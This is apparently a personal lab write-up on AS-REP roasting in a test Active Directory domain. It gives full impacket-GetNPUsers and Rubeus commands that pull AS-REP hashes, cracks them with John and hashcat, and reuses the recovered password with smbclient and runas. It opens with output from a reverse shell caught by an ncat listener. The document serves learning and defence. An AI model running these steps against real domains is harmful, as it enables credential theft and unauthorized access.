Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 881D 3F3D 0CEC 49A2 6A55 E483 902A C0A3 33BF 068F
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.0.0.5.
Ncat: Connection from 10.0.0.5:64218.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

That is good enough for me. Time to move on. I believe I have improved my knowledge about Kerbeorasting.









Beginning AS-REP Roasting with Impacket and Rubeus

In this post, I'm learning about Kerberos and one of its attacks. Specifically, I'm learning about Authentication Service Response (AS-REP) Roasting. Based on my learnings, this is an attack that should be highly unlikely today, as by default, in Active Directory, it is more likely the feature that enables this attack is disabled. I am, as always, doing this from the perspective of enhancing my learning. In this post, I learned more about Kerberoasting

First up, here is what a normal Active Directory Kerberos authentication looks like within the first 4 packets.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r AD-Authentication.pcapng -Y '(kerberos.msg_type == 10) || (kerberos.msg_type == 11) || (kerberos.msg_type == 30)' 
    8  10.244059   10.0.0.108 → 10.0.0.5     KRB5 311 AS-REQ
    9  10.248297     10.0.0.5 → 10.0.0.108   KRB5 258 KRB Error: KRB5KDC_ERR_PREAUTH_REQUIRED
   16  10.259148   10.0.0.108 → 10.0.0.5     KRB5 391 AS-REQ
   17  10.261119     10.0.0.5 → 10.0.0.108   KRB5 2131 AS-REP
  153  28.562552   10.0.0.108 → 10.0.0.5     KRB5 294 AS-REQ

As shown in packet 8, the client makes a request.
In packet 9, the server responds with a KRB ERROR, stating pre-authentication is required. Without this pre-authentication requirement, someone would be able to request Ticket Granting Ticket (TGT) for those users who do not have this feature enabled and then crack the user's password. Once you have the cracked password, then you can authenticate as that user.

Looking at this in practice, from an Active Directory perspective, the user would have to deliberately disable the pre-authentication as shown below.


Let's now leverage a tool from the Impacket suite of tools to see which accounts have pre-authentication disabled. Let's say we have a have access to a low level account that is just a member of Domain Users, we can use that account and impacket-GetNP to learn about users with pre-authentication disabled.

┌──(root💀securitynik)-[~]
└─# impacket-GetNPUsers -dc-ip 10.0.0.5 -ts  securitynik.local/nakia:Testing1
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

Name   MemberOf                                                                       PasswordLastSet             LastLogon                   UAC      
-----  -----------------------------------------------------------------------------  --------------------------  --------------------------  --------
neysa  CN=24-baez64102-admingroup,OU=Groups,OU=SEC,OU=Tier 2,DC=securitynik,DC=local  2021-02-13 17:37:20.397803  2021-11-17 02:18:18.769182  0x410200 

Now that we know a user has pre-authentication check disabled, let's request a ticket on this user behalf. At the same time, I will output the contents to a file and provide that file to John to crack.

┌──(root💀securitynik)-[~]
└─# impacket-GetNPUsers -dc-ip 10.0.0.5 -ts  securitynik.local/nakia:Testing1 -request -format john -outputfile no-preauth.john
Impacket v0.9.24.dev1+20210928.152630.ff7c521a - Copyright 2021 SecureAuth Corporation

Name   MemberOf                                                                       PasswordLastSet             LastLogon                   UAC      
-----  -----------------------------------------------------------------------------  --------------------------  --------------------------  --------
neysa  CN=24-baez64102-admingroup,OU=Groups,OU=SEC,OU=Tier 2,DC=securitynik,DC=local  2021-02-13 17:37:20.397803  2021-11-17 02:18:18.769182  0x410200 

When we cat the file, we see ...

┌──(root💀securitynik)-[~]
└─# cat no-preauth.john 
$krb5asrep$neysa@SECURITYNIK.LOCAL:3032d987619dfe5bba1bda3905f2b61e$ccd95cf20d0eff70f1e7fdadd372ca250451335cd5c30960f7f3f8c1dfa545169c73c31ca970b89ca6c5ee06cdaec5cfaea66fbcdaf0fa8e859fdbd791c9c6cbf9a699cfead4d078cdc48d44a971ebea0c76680e14c21028b5c22c9ef27999f77c867d260967b5fee9eb593a0e2fe6f4ca69188f37bdb36241761a7d4699d2a15a35fdeed80213b33ba95613fb349a9868aa178986891619705fbf6820d4e768a0477fa0964cf5608fa90dea33a2f5da58b74a24b967937fcdc436af26f65699c7b3fdc9f298289b0cb91674575df83f97f33076df7f93853462deb375528fa548aab4fda4ac6f04be421b0c6d46a4fd32585bc4948b

We can now provide the file to John, with our wordlist. 

Before giving the password to John, what did the query look like on the wire.

┌──(root💀securitynik)-[~/packets]
└─# tshark -n -r no-preauth.pcap -Y '(kerberos.msg_type == 10) || (kerberos.msg_type == 11) || (kerberos.msg_type == 30)' 
    4   0.000441   10.0.0.107 → 10.0.0.5     KRB5 246 AS-REQ
    5   0.002625     10.0.0.5 → 10.0.0.107   KRB5 2376 AS-REP

As seen above, there is no pre-authentication message in this capture as was seen in the first capture. 

Feeding the file to John.

┌──(root💀securitynik)-[~]
└─# john --format=krb5asrep no-preauth.john  --wordlist=~/SEC-504/pass.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates left, minimum 16 needed for performance.
Testing1         ($krb5asrep$neysa@SECURITYNIK.LOCAL)
1g 0:00:00:00 DONE (2021-11-17 03:33) 50.00g/s 250.0p/s 250.0c/s 250.0C/s sans..Testing1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Voila, now we have the user's password and username and thus can reuse it to gain access. Let's try listing any shares on the remote machines, using smbclient.

┌──(root💀securitynik)-[~/packets]
└─# smbclient --list=10.0.0.5 --user=SECURITYNIK/neysa%Testing1 --max-protocol SMB3 --encrypt

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

Leveraging Rubeus for AS-REP Roasting

Now that I understand how to use Impacket for this, time to look at another tool, Rubeus.

C:\Tools>Rubeus.exe asreproast /format:hashcat /dc:dc-2019.securitynik.local /outfile:asrep-roast.hashes

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.6.4


[*] Action: AS-REP roasting

[*] Target Domain          : securitynik.local
[*] Target DC              : dc-2019.securitynik.local

[*] Searching path 'LDAP://dc-2019.securitynik.local/DC=securitynik,DC=local' for AS-REP roastable users
[*] SamAccountName         : neysa
[*] DistinguishedName      : CN=Neysa,OU=SecurityNik-Users,DC=securitynik,DC=local
[*] Using domain controller: dc-2019.securitynik.local (10.0.0.5)
[*] Building AS-REQ (w/o preauth) for: 'securitynik.local\neysa'
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\Tools\asrep-roast.hashes

[*] Roasted hashes written to : C:\Tools\asrep-roast.hashes

Looking at the contents of the file.

C:\Tools> type asrep-roast.hashes
$krb5asrep$23$neysa@securitynik.local:4F4D040B3DFFBEEAC4761AA7B5F62C11$39EFEBF767A19822771789E8AA0286ACA05383F57F421D12C7D2F12E285F6E4386A3C102C3B252B120B07DE1736B80D27098907D1122C45FA79E2CF48843D16E8F96D2E1F59DFAE340610B2F1EF193D634E5954A83CF340CB003AD4EED34B84DEAF1170750C59C8371DECB21949A61A97D8FD66153527F7322AB5BD54F7285EDAF14BCF6B20C4C6E2480EC859DB8C3D784D7BCC8559FAF6A2DE7C20DAD89FD54CF65ABAC8EA92FFB4F313691DDF7EA3255486092845C3CBEB2B55B569BA5923AAFB15B01379B9C919E43F9F0F321AABFFBD16D53F877A650D65ECA2B56741C5D17BCC73DD69A495AFC94ADF77578629CC9C95750002C

Passing the file to Hashcat. we see the password at the end of the line below.

D:\TOOLS\hashcat-6.2.4>hashcat.exe --attack-mode 0 --hash-type 18200 c:\tmp\asrep-roast.hashes ..\pass.txt
hashcat (v6.2.4) starting
...

$krb5asrep$23$neysa@securitynik.local:4f4d040b3dffbeeac4761aa7b5f62c11$39efebf767a19822771789e8aa0286aca05383f57f421d12c7d2f12e285f66e4386a3c102c3b252b120b07de1736b80d27098907d1122c45fa79e2cf48843d16e8f96d2e1f59dfae340610b2f1ef193d634e5954a83cf340cb003ad4eed34b84deeaf1170750c59c8371decb21949a61a97d8fd66153527f7322ab5bd54f7285edaf14bcf6b20c4c6e2480ec859db8c3d784d7bcc8559faf6a2de7c20dad89fd54cf65aabac8ea92ffb4f313691ddf7ea3255486092845c3cbeb2b55b569ba5923aafb15b01379b9c919e43f9f0f321aabffbd16d53f877a650d65eca2b56741c5d17bcc73ddd69a495afc94adf77578629cc9c95750002c:Testing1

As before, now that we have the password, we can authenticate

C:\Tools>runas /user:securitynik\neysa cmd.exe
Enter the password for securitynik\neysa:
Attempting to start cmd.exe as user "securitynik\neysa" ...



Good start. That was a good piece of learning for me, as I look to expand my knowledge on Kerberos.

References: